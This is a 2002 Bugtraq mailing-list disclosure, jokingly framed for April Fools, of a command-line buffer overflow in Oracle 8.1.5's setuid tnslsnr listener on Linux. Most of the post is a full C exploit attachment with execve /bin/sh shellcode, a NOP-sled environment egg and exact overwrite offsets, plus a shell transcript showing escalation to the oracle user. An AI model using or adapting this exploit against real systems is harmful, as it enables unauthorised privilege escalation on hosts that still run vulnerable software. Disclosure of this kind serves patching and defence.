Date: Mon, 01 Apr 2002 10:22:43 -0500
From: KF <[email protected]>
To: bugtraq <[email protected]>,
Subject: Happy Easter / April Fools from Snosoft (Oracle 8.1.5 tnslsnr)
--------------020109060402040309060401
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
This is ment to be an April fools joke but if you still use old Oracle
its not to funny I guess:
After I ate a few too many hard boiled eggs this weekend I decided to
install Oracle and play with it a little. Being poor I didn't have 800
bones to shell out on Oracle 16i so I had to settle with oldschool
Oracle 8i from this little mom and pop shop on my corner. They just
happened to have a copy that would run on linux and it was only 50 bucks
so I bought it! After the install no more than 10 minutes later I found
an issue... I figured that most anything I would have found would
already be public knowlege or it was patched up somewhere along the way
to the current product version. Well from what I can tell this is an
unknown issue.
TNSLSNR for Linux: Version 8.1.5.0.0 - Production on 01-APR-02 11:46:53
[itchie@ghetto itchie]$ ls -al
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
-rwsr-s--x 1 oracle oracle 4399723 Jun 11 1999
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
There were holes reported on the abuse of $ORACLE_HOME....
http://online.securityfocus.com/archive/1/140704
which tnslsnr had issues with but these appeared patched on this install
so I didn't bother trying to use env variables as abuse
[dotslash@ghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x 9000'`
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
(no result...exit normally)
The first thing abnormal I tried hit right on the money... simple
cmdline b0f
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
`perl -e 'print "A" x 9000'`
Segmentation fault
Of course I had to give one of my developers a quick ring and try to
harass him to stop molesting the eater bunny and take a second to code
me up an exploit. Much obliged "The Itch" took about 10 minutes
(literally) to come up with the following...
Happy Easter! and April Fools?!
[itchie@ghetto tmp]$ cc -o tnslsnrx tnslsnrx.c
[itchie@ghetto tmp]$ id
uid=507(itchie) gid=507(itchie) groups=507(itchie)
[itchie@ghetto tmp]$ ./tnslsnrx
Oracle tnslsrn 8.1.5
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org
Using return address: 0xbffffaf4
Using buffersize : 2132
sh-2.05$ id
uid=515(oracle) gid=507(itchie) groups=507(itchie)
-KF
--------------020109060402040309060401
Content-Type: text/plain;
name="8iwasbreakable.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="8iwasbreakable.c"
/*
* Yet another exploit for the 'Unbreakable' Oracle database
* The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
* Shellcode created by r0z / Promisc
* Exploit coded up by The Itch / Promisc (http://www.promisc.org)
*
* This exploit was developed on the Snosoft vulnerability research machines
* mail [email protected] if you wish to participate in vuln research.
*
* - The Itch
* - [email protected]
*
* - Technical details concerning the exploit -
*
* 1). Buffer overflow occurs after writing more then 2132 bytes into the
* buffer at the command line 2128 to overwrite ebp, 2132 to
* overwrite eip).
* 2). If you write more then 2132 bytes, other frames will be
* overwritten afterwards and will mess up your flow of arbitrary code
* execution. (It must be exactly 2132 bytes!)
* 3). shellcode will try to do a setreuid(515);
*/
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90
/* 2132 + 1 for the \0 at the end of the string */
#define DEFAULT_BUFFER_SIZE 2133
/* Shellcode made by r0z ([email protected]) */
char shellcode[] =
"\x31\xdb" /* xor %ebx, %ebx */
"\x31\xc9" /* xor %ecx, %ecx */
"\xf7\xe3" /* mul %ebx */
"\xb0\x46" /* mov $0x46, %al */
"\x66\xbb\x03\x02" /* mov $0x1fc, %bx */
"\x49" /* dec %ecx */
"\xcd\x80" /* int $0x80 */
"\x31\xd2" /* xor %edx, %edx */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp, %ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp, %ecx */
"\x6a\x0b" /* pushl $0xb */
"\x58" /* pop %eax */
"\xcd\x80"; /* int $0x80 */
int main(int argc, char *argv[])
{
char *buff;
char *egg;
char *ptr;
long *addr_ptr;
long addr;
int bsize = DEFAULT_BUFFER_SIZE;
int eggsize = DEFAULT_EGG_SIZE;
int i;
int get_sp = (int)&get_sp;
if(argc > 1) { bsize = atoi(argv[1]); }
if(!(buff = malloc(bsize)))
{
printf("unable to allocate memory for %d bytes\n", bsize);
exit(1);
}
if(!(egg = malloc(eggsize)))
{
printf("unable to allocate memory for %d bytes\n", eggsize);
exit(1);
}
printf("Oracle tnslsrn 8.1.5\n");
printf("Vulnerability found by KF / http://www.snosoft.com\n");
printf("Coded by The Itch / http://www.promisc.org\n\n");
printf("Using return address: 0x%x\n", get_sp);
printf("Using buffersize : %d\n", bsize - 1);
ptr = buff;
addr_ptr = (long *) ptr;
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode)-1; i++)
{
*(ptr++) = NOP;
}
for(i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
putenv(egg);
buff[bsize - 1 ]= '\0';
execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",
"tnslsnr", buff, 0);
return 0;
}
--------------020109060402040309060401--
